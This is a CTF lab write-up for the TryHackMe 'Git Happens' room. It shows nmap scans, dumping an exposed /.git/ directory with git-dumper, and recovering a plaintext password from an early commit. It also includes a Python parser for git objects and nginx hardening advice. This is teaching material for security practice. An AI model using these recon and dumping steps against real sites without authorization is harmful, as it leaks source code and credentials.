THM Writeup – Git Happens

Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy!

Room: Git Happens

Difficulty: Easy

Operating System: Linux

Author: hydragyrum

Can you find the password to the application?

Add the target IP address to your hosts file (as root):

echo '10.10.42.122    git.thm' >> /etc/hosts

Scan the target machine, finding open ports first (a SYN scan needs root):

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv git.thm

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 80 git.thm

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-git: 
|   10.10.42.122:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!

Only port 80 is open, and nmap's http-git script has already spotted a git repository under /.git/, so let's look at the web application first and then at the repository. A quick manual confirmation is to request http://git.thm/.git/HEAD: a live repository answers with a line such as ref: refs/heads/master.

Browse to http://git.thm/

[Screenshot: web application login page]

We could try some SQL injection attacks, but I don't think it's going to be about SQLi. The room's name tells us we should look at the git repository 😉

Browse to http://git.thm/.git/

[Screenshot: directory listing of the git repository]

At this point we need to find out how to grab the whole repo to our disk. I had no clue, so I googled how to dump a git repository from a website:

[Screenshot: search results for dumping a git repo from a website]

And a tool exactly for this purpose came up.

As per its README, install git-dumper:

pip install git-dumper

Create a directory for the repository and run git-dumper:

mkdir gitroom
git-dumper http://git.thm/.git/ gitroom/

Change into the gitroom directory and list the commit history:

root@ip-10-10-54-253:~# cd gitroom/ 
root@ip-10-10-54-253:~/gitroom# git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:08:38 2020 +0200

    setup dockerfile and setup defaults.

commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:42:30 2020 +0200

    Make sure the css is standard-ish!

commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:41:12 2020 +0200

    re-obfuscating the code to be really secure!

commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:37:32 2020 +0200

    Security says obfuscation isn't enough.
    
    They want me to use something called 'SHA-512'

commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:25:52 2020 +0200

    Obfuscated the source code.
    
    Hopefully security will be happy!

commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit

The commit with the message "Made the login page, boss!" is the interesting one: the later commits say the code was obfuscated and then switched to SHA-512, so the original login page should still contain the password in the clear. Let's check it out.

Check what is inside that commit:

root@ip-10-10-54-253:~/gitroom# git checkout 395e087334d613d5e423cdf8f7be27196a360459
Note: checking out '395e087334d613d5e423cdf8f7be27196a360459'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at 395e087 Made the login page, boss!

Run the checkout from the repository's working tree, i.e. from gitroom/, not from inside gitroom/.git; git refuses to check out files when it is run from inside the .git directory.

Now list the files as they were in that commit and read index.html:

root@ip-10-10-54-253:~/gitroom# ls -lA
total 20
drwxr-xr-x 2 root root 4096 Feb  9 14:31 css
-rw-r--r-- 1 root root  677 Feb  9 14:31 dashboard.html
drwxr-xr-x 7 root root 4096 Feb  9 14:35 .git
-rw-r--r-- 1 root root 2667 Feb  9 14:31 index.html
-rw-r--r-- 1 root root   54 Feb  9 14:05 README.md
root@ip-10-10-54-253:~/gitroom# less index.html

And we have the super secret password…
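To show why an exposed /.git/ is a full source and history disclosure even without a directory listing, here is an added example (my code, not part of the original writeup and not git-dumper's code) that reads a dumped .git directory the way git itself does: it follows HEAD to the branch ref, decompresses the loose objects under objects/xx/yyyy..., parses commit and tree objects, and prints index.html at every commit. The repository it walks is constructed in a temp directory; the commit messages, the file contents and the placeholder password "hunter2" are made up for the example. Packed objects (objects/pack/) are not handled.

```python
"""Walk the history inside a dumped .git directory without the git CLI.

Added example for this writeup, not code from the post or from git-dumper.
Loose objects sit zlib-compressed under objects/xx/yyyy..., named by the SHA-1
of "<type> <size>\\0<body>"; packed objects (objects/pack/) are out of scope."""
import hashlib
import os
import tempfile
import zlib

def hash_object(kind, body):
    """Object id exactly as git computes it."""
    return hashlib.sha1(f"{kind} {len(body)}\0".encode() + body).hexdigest()

def write_object(gitdir, kind, body):
    """Store a loose object the way git does (used only to build the sample)."""
    oid = hash_object(kind, body)
    path = os.path.join(gitdir, "objects", oid[:2], oid[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(f"{kind} {len(body)}\0".encode() + body))
    return oid

def read_object(gitdir, oid):
    """Return (type, body) of a loose object, checking the size in its header."""
    with open(os.path.join(gitdir, "objects", oid[:2], oid[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    header, body = raw.split(b"\0", 1)
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"corrupt object {oid}")
    return kind, body

def parse_commit(body):
    """Split a commit object into (tree id, parent ids, message)."""
    headers, _, message = body.partition(b"\n\n")
    tree, parents = None, []
    for line in headers.split(b"\n"):
        key, _, value = line.partition(b" ")
        if key == b"tree":
            tree = value.decode()
        elif key == b"parent":
            parents.append(value.decode())
    return tree, parents, message.decode().strip()

def tree_entries(body):
    """Yield (name, oid) from a tree: entries are "<mode> <name>\\0" + 20 raw id bytes."""
    pos = 0
    while pos < len(body):
        nul = body.index(b"\0", pos)
        name = body[body.index(b" ", pos) + 1:nul].decode()
        yield name, body[nul + 1:nul + 21].hex()
        pos = nul + 21

def blob_at(gitdir, tree_oid, name):
    """Content of a top-level file in the given tree, or None if it is absent."""
    for entry_name, oid in tree_entries(read_object(gitdir, tree_oid)[1]):
        if entry_name == name:
            return read_object(gitdir, oid)[1]
    return None

def resolve_head(gitdir):
    """Follow HEAD (symbolic or detached) to a commit id."""
    with open(os.path.join(gitdir, "HEAD")) as f:
        head = f.read().strip()
    if head.startswith("ref: "):
        with open(os.path.join(gitdir, head[5:])) as f:
            return f.read().strip()
    return head

def history_of(gitdir, name):
    """First-parent history from HEAD as [(message, content of name)], newest first."""
    out, oid = [], resolve_head(gitdir)
    while oid:
        tree, parents, message = parse_commit(read_object(gitdir, oid)[1])
        out.append((message, blob_at(gitdir, tree, name)))
        oid = parents[0] if parents else None
    return out

def build_sample_repo():
    """Constructed two-commit repo: a plaintext password check, then a hashed one."""
    gitdir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(gitdir, "refs", "heads"))
    with open(os.path.join(gitdir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    ident = b"Dev <dev@example.invalid> 1595543743 +0200"  # made-up author/committer
    parent = None
    for message, html in [  # made-up file contents; "hunter2" is a placeholder secret
        ("Made the login page, boss!", b'<script>if (pw == "hunter2") ok();</script>\n'),
        ("Security says obfuscation isn't enough.", b'<script>if (sha512(pw) == "9f86...") ok();</script>\n'),
    ]:
        blob = write_object(gitdir, "blob", html)
        tree = write_object(gitdir, "tree", b"100644 index.html\0" + bytes.fromhex(blob))
        lines = [f"tree {tree}".encode()] + ([f"parent {parent}".encode()] if parent else [])
        lines += [b"author " + ident, b"committer " + ident, b"", message.encode()]
        parent = write_object(gitdir, "commit", b"\n".join(lines) + b"\n")
    with open(os.path.join(gitdir, "refs", "heads", "master"), "w") as f:
        f.write(parent + "\n")
    return gitdir

if __name__ == "__main__":
    for message, content in history_of(build_sample_repo(), "index.html"):
        print(f"{message}\n    {content!r}")
```

This is the same walk git-dumper performs over HTTP, which is why it works whether or not the server has directory listing enabled: HEAD, the ref it names and the object ids inside each commit and tree are all predictable paths. With the dumped repository on disk you do not need to check out each commit either: git show 395e087:index.html prints the file as it was at that commit, and git log -p -- index.html shows every change made to it, including the version from before the "obfuscation" commits. On the defensive side, the fix is to keep the .git directory out of the document root entirely, or at least deny it in nginx with a location block matching /\.git that returns 404, and to treat any password that was ever committed as burned, since rewriting history does not recall the copies already cloned.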
